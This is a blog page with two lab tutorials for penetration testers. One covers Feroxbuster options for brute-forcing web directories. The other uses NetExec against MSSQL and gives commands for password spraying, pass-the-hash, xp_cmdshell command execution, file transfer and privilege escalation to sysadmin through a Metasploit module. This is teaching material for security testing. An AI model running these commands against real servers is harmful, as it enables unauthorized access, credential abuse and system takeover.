A Detailed Guide on Feroxbuster

at 10:02 PM Wednesday, September 11, 2024 0 comments

 Feroxbuster is a robust tool designed to identify directories and files on web servers using brute-force techniques. It is frequently utilized in penetration testing and security evaluations to detect concealed paths and resources. Here we are going to discuss about various tasks which we can perform using Feroxbuster.

Table of contents

·      Lab setup

·      Installation

·      Default mode

·      Redirects

·      Extensions

·      Result output

·      User agent

·      Filter status code

·      Quiet mode

·      Controlling threads

·      Custom wordlist

·      Disable recursion

·      Limit recursion depth

·      Force Recursion

·      Filter by character size

·      Filter by number of words

·      Filter by number of lines

·      Filter by status code using deny list

·      Filter by status code using allow list

·      Generating random User-Agent

·      HTTP methods

·      Custom headers

·      Cookies

·      Adding slash

·      Capturing requests in Burp

·      Read target from list

·      Resume from last state

·      Follow redirect

·      Timeout

·      Comparasion between Feroxbuster and other tools

·      Conclusion

Lab setup

Target Machine: 192.168.1.4

Attacker Machine: 192.168.1.31 (Kali Linux)

After setting up a web server in the target machine, we can proceed with the enumeration in the kali linux after installing Feroxbuster.

Installation

To install the Feroxbuster in kali linux, we can use the following command:

apt install feroxbuster



Default mode

Once we are done with the installation, we can proceed with the enumeration part. To perform a default directory brute force, we can use the following the command:

feroxbuster -u http://192.168.1.4



It can be seen from above that the wordlist used in default mode is the raft-medium-directories.txt.

To get a less verbose output, we can use the --silent flag to hide the non-essential data.

feroxbuster -u http://192.168.1.4 --silent



Redirects

In order to allow the Feroxbuster to continue the directory brute forcing on the redirected URL, we can use the -r or --redirect flag. For example if http://192.168.1.4 redirects to http://192.168.1.4/newpath, Feroxbuster will follow this redirection and continue to scan http://192.168.1.4/newpath for directories and files.

feroxbuster -u http://192.168.1.4 -r



Extensions

To perform brute-force for a particular type of file extension, the -x or --extensions flag can be used.

feroxbuster -u http://192.168.1.4 -x php,txt --silent



Result output

If we want to log the output, we use the --output flag and then mentioning the file name.

feroxbuster -u http://192.168.1.4 --output results.txt



User agent

To set up a custom user agent to send request at the server, we can use the -a or --user-agent flag. By default, the user agent used by Feroxbuster is feroxbuster/<version>.

feroxbuster -u http://192.168.1.4 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"



Filter status code

There are times when we need to skip certain status codes responses, so we can use the -C or --filter-status, to skip the results of the mentioned codes. If we want to include a particular status code in output, we can use the -s or --status-codes flag.

feroxbuster -u http://192.168.1.4 -C 403,404



Quiet mode

To present the output without showing the progress bar or banner, we can use the quite mode by giving the -q or --quiet flag.

feroxbuster -u http://192.168.1.4 -q



Controlling threads

To control the number of concurrent threads depending on the environment type, we can use the --threads or -t flag. The default threads value is 50.

feroxbuster -u http://192.168.1.4 -t 20



Custom wordlist

To use a custom wordlist, we can use the -w or --wordlist flag and then give the wordlist path. Here we are giving the common.txt file path.

feroxbuster -u http://192.168.1.4 -w /usr/share/wordlists/dirb/common.txt



Disable recursion

To allow the scanning of only top level directories, we can set the -n or --no-recursion flag to disable the recursive scanning.

feroxbuster -u http://192.168.1.4 -n



Limit recursion depth

To set a limit on the depth of recursion, we can use the -L or --scan-limit.

feroxbuster -u http://192.168.1.4 -L 4



Force Recursion

To ensure that the recursion is used, we can use the --force-recursion flag.

feroxbuster -u http://192.168.1.4 --force-recursion



Filter by character size

To filter out the messages of a particular length, we can use the -S or --filter-size flag. This will filter based on character size.

feroxbuster -u http://192.168.1.4 -q

feroxbuster -u http://192.168.1.4 -q -S 285,286,283,289



Filter by number of words

To filter out the results using number of words filter, we can use the -w or --filter-words flag.

feroxbuster -u http://192.168.1.4 -q

feroxbuster -u http://192.168.1.4 -q -W 33



Filter by number of lines

To filter out the results using number of words filter, we can use the -N or --filter-lines flag.

feroxbuster -u http://192.168.1.4 -q

feroxbuster -u http://192.168.1.4 -q -N 9



Filter by status code using deny list

To filter the results using status codes (deny list), we can use the --filter-status flag.

feroxbuster -u http://192.168.1.4 -q

feroxbuster -u http://192.168.1.4 -q --filter-status 404



Filter by status code using allow list

To filter the results using status codes (allow list), we can use the --status-codes flag.

feroxbuster -u http://192.168.1.4 -q

feroxbuster -u http://192.168.1.4 -q --status-codes 200,301



Generating random User-Agent

To use a random user agent for every request, we can use the -A flag. Here we have used the --burp flag simultaneously to show how the user agent looks in the requests.

feroxbuster -u http://192.168.1.4 -A --burp



HTTP methods

To explicitly define the HTTP methods to be used, we can use the -m flag and then state the method to be used like POST. The default method is GET while running the Feroxbuster.

feroxbuster -u http://192.168.1.4 -m POST



Custom headers

To explicitly define the request header to be used, we can use the -H flag and then state the header alongwith the value to be used like 'Content-Type: application/x-www-form-urlencoded'. Here we have used the --burp flag simultaneously to show how the user agent looks in the requests.

feroxbuster -u http://192.168.1.4 -H 'Content-Type: application/x-www-form-urlencoded' --burp -q



Cookies

To use a specific cookie value in all the requests, we can mention the cookies header alongwith the value. The flag which can be used here is --cookies or -b. Here we have used the --burp flag simultaneously to show how the cookie looks in the requests.

feroxbuster -u http://192.168.1.4 --cookies PHPSESSID=t54ij15l5d51i2tc7j1k1tu4p4 --burp -q



Adding slash

To add a slash (/) after every request, we can use the -f or --add-slash flag.

feroxbuster -u http://192.168.1.4 -f



Capturing requests in Burp

To capture a request in Burp Suite, we can use the --burp flag while running the scan.

feroxbuster -u http://192.168.1.4 --burp

 


 

Read target from list

To perform the scanning on the targets provided in the list, we can use the following command:

cat target.txt

cat target.txt| feroxbuster --stdin -q


 

 

Resume from last state

If we wish to resume the scan from the last state, we can use the --resume-from flag and provide the .state file. There are times when we need to terminate the scan in between, so Feroxbuster will save the results in the file.

feroxbuster -u http://192.168.1.4 -q

feroxbuster --resume-from ferox-http_192_168_1_4-1723370176.state -q



Follow redirect

While scanning if there are requests which result in the redirection, so we can control that by allowing the clients to follow the redirects using -r flag.

feroxbuster -u http://192.168.1.4  -r



Timeout

To setup a timeout limit, we can use the -T flag. This determines the amount of time the Feroxbuster wil wait for the server response before terminating the scan. By default, this value is set to 7 seconds, however we can modify it by using the flag.

feroxbuster -u http://192.168.1.4



The above image shows the default timeout limit used and now we are going to modify it to 5 seconds.

feroxbuster -u http://192.168.1.4 -T 5

 



Comparasion between Feroxbuster and other tools

·      Feroxbuster stands out for its comprehensive set of features, including extensive response filtering, Burp Suite integration, and customization options. It provides a balance between advanced functionality and user control, making it a powerful choice for detailed and nuanced directory and file brute-forcing.

·      DirBuster is user-friendly with its GUI but may not be as fast or flexible as command-line tools like Feroxbuster.

·      Gobuster offer speed and efficiency but with fewer advanced features and less flexibility compared to Feroxbuster.

·      ffuf provides high performance and extensive filtering but can be complex to configure and use.

Conclusion

In conclusion, we can say that Feroxbuster is an excellent choice for those requiring precise control over their scanning processes, advanced filtering capabilities, and the ability to integrate with other tools.

Labels:

MSSQL for Pentester: NetExec

at 5:36 AM Saturday, August 24, 2024 0 comments

NetExec (nxc) is a powerful network exploitation tool developed as a modern successor to CrackMapExec (CME), which was widely used by penetration testers and red teamers. Earlier CrackMapExec was actively maintained by mpgn, after which NetExec emerged as a popular choice. In this article we are going to cover most of the parts where this tool can come in handy to automate tasks like password spraying, command execution, file upload and many more. Here we will be performing the test cases on MSSQL server using nxc tool.

Table of Contents

·      Lab Setup

·      Password spray using nxc

·      Command execution using nxc

·      File upload and download using nxc

·      Privilege escalation using nxc

·      Command execution as administrator using nxc

·      Enumeration on a different port number

·      Password spray using nxc continued

·      Conclusion

Lab Setup

Target Machine: Windows 10 (192.168.31.126)

Attacker Machine: Kali Linux (192.168.31.141)

For demonstration purposes, here we will be using the MSSQL service to show all the test cases. We have already setup the MSSQL server on the target machine and created few users for the running instance.



Password spray using nxc

In order to check for the correct credentials, we will create a dictionary of usernames as users.txt and passwords as pass.txt. Once we have the dictionaries created, we can perform the password spray attack to check for the correct username and password. We are going to perform this spray on the MSSQL server. Following will be the command to do so:

nxc mssql 192.168.31.126 -u users.txt -p pass.txt --continue-on-success | grep [+]



To perform the password spray using the local authentication, we can use the    --local-auth flag as it specifies that the authentication attempts should be made against the local accounts on the MSSQL server.

nxc mssql 192.168.31.126 -u users.txt -p pass.txt --continue-on-success --local-auth | grep [+]



If we want to perform password spray in such a way that each username should be used ony with its corresponding password from the list, then we can use the --no-bruteforce flag. If the username-password pair matches, it will proceed otherwise it will skip to the next pair without trying other possible combinations.

nxc mssql 192.168.31.126 -u users.txt -p pass.txt --continue-on-success --no-bruteforce



There are situations when we have the NTLM hashes instead of the passwords so we can use the nxc to perform the password spray using the hash by giving the -H flag.

nxc mssql 192.168.31.126 -u users.txt -H 64FBAE31CC352FC26AF97CBDEF151E03 --continue-on-success | grep [+]



We can use two methods to authenticate to MSSQL i.e., windows or local, the default authentication is windows. To use local authentication, add the following flag --local-auth in the command. Here we are trying to perform the local authentication as sa user.

nxc mssql 192.168.31.126 -u sa -p 'Password@123' --local-auth



As mentioned previously, we can also test for the windows authentication. Since the default mode is set to windows authentication, hence we don’t need to give any authentication flag to perform windows authentication.

nxc mssql 192.168.31.126 -u administrator -p 'Ignite@987'



Command execution using nxc

We can use nxc to query the database, by giving -q flag and then mentioning the database query. The command to do so will be:

nxc mssql 192.168.31.126 -u sa -p 'Password@123' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'




In order to perform the system level commands, we can use the -x flag which uses the MSSQL xp_cmdshell to execute the commands. We can use both windows and local authentication here depending on our need.

nxc mssql 192.168.31.126 -u sa -p 'Password@123' --local-auth -x ipconfig

nxc mssql 192.168.31.126 -u administrator -p 'Ignite@987' -x ipconfig





File upload and download using nxc

We can also upload the file into the target system using nxc by giving the --put-file flag which will take the filename and we will also mention the path where the file needs to uploaded.

nxc mssql 192.168.31.126 -u administrator -p 'Ignite@987' --put-file file.txt C:\\Windows\\Temp\\file.txt



It can be seen that the file has been successfully uploaded at the required path.



Similarly, we can also download the file using the --get-file flag. Here we need to mention the complete path of the file which needs to be download and also the path where the file needs to be placed at our end.

nxc mssql 192.168.31.126 -u administrator -p 'Ignite@987' --get-file C:\\Windows\\Temp\\file.txt /tmp/file.txt



Privilege escalation using nxc

Here we are going to check if the current user is allowed to perform privilege escalation or not by using the mssql_priv module of the nxc. We can explicitly mention the module name after the -M flag. Here we are going to use the raj user to check for privilege escalation. This can be used in cases where we perform the windows authentication and try for privilege escalation. The output of the command shows that the user raj can impersonate sa user. Impersonating a user means temporarily assuming the identity and privileges of that user.

nxc mssql 192.168.31.126 -u raj -p 'Password@1' -M mssql_priv



The same process can be repeated using the local authentication by adding the --local-auth flag.

nxc mssql 192.168.31.126 -u ignite -p 'Password@1' -M mssql_priv --local-auth


It can be seen that the user ignite can impersonate the user sa using local authentication, hence we will perform the privilege escalation as next step. The properties of the Ignite user can also be seen in the victim machine.

To perform privilege escalation, we will use the Metasploit framework. There is a module by the name auxiliary/admin/mssql/mssql_escalate_execute_as, which can be used to perform privilege escalation. Following will be the commands used in the module:

use auxiliary/admin/mssql/mssql_escalate_execute_as

set rhosts 192.168.31.126

set database master

set username ignite

set password Password@1

exploit

After running the exploit, it shows that the user ignite is now sysadmin. To check this, we will once again run the previously used command in nxc. The output of command shows that the user ignite is already a sysadmin. We can confirm this in the victim machine also that the user ignite is sysadmin.

 



Command execution as administrator using nxc

Let us assume that somehow we get the hash of the administrator user and we want to execute the system level commands using MSSQL, so we can use nxc to perform that. First we will check if the windows authentication is successful or not and then we can give the -x flag to perform the command execution.

nxc mssql 192.168.31.126 -u administrator -H 32196B56FFE6F45E294117B91A83BF38

nxc mssql 192.168.31.126 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig


Enumeration on a different port number

If the MSSQL server is running on a different port number, then also we can perform the same test cases by just mentioning the port number explicitly using --port flag.

nmap -sV -p 9070 192.168.31.126



As we can see that the MSSQL server is running on port 9070. So we can give command as follows:

nxc mssql 192.168.31.126 -u administrator -p 'Ignite@987' --port 9070



Password spray using nxc continued

Once we are ready with the list of usernames and passwords, we can perform the password spray using nxc. Here we can mention the authentication method explicitly. If no flag is used, then the authentication method will be windows authentication. Here we are using the --continue-on-success flag so that all the combinations are tried even if the successful login is obtained.

nxc mssql 192.168.31.126 -u users.txt -p pass.txt --continue-on-success



Similarly, we can perform the password spray using the local authentication.

nxc mssql 192.168.31.126 -u users.txt -p pass.txt --continue-on-success --local-auth



The above scenario clearly shows what all user accounts are used for the local authentication and windows authentication.

We can also perform the same if we have obtained a hash but we are not sure that the hash belongs to which user. Here we will be passing a list of users and giving the obtained hash value in the -H flag.

nxc mssql 192.168.31.126 -u users.txt -H 64FBAE31CC352FC26AF97CBDEF151E03 --continue-on-success



Conclusion

NetExec (nxc) stands out as a highly effective and adaptable tool for security experts, delivering advanced features for network exploitation and post-exploitation tasks. Its comprehensive functionality allows for efficient password spraying and command execution on not only MSSQL server but other services as well, making it an essential asset in both penetration testing and red teaming operations.





Labels:
Subscribe to: Posts (Atom)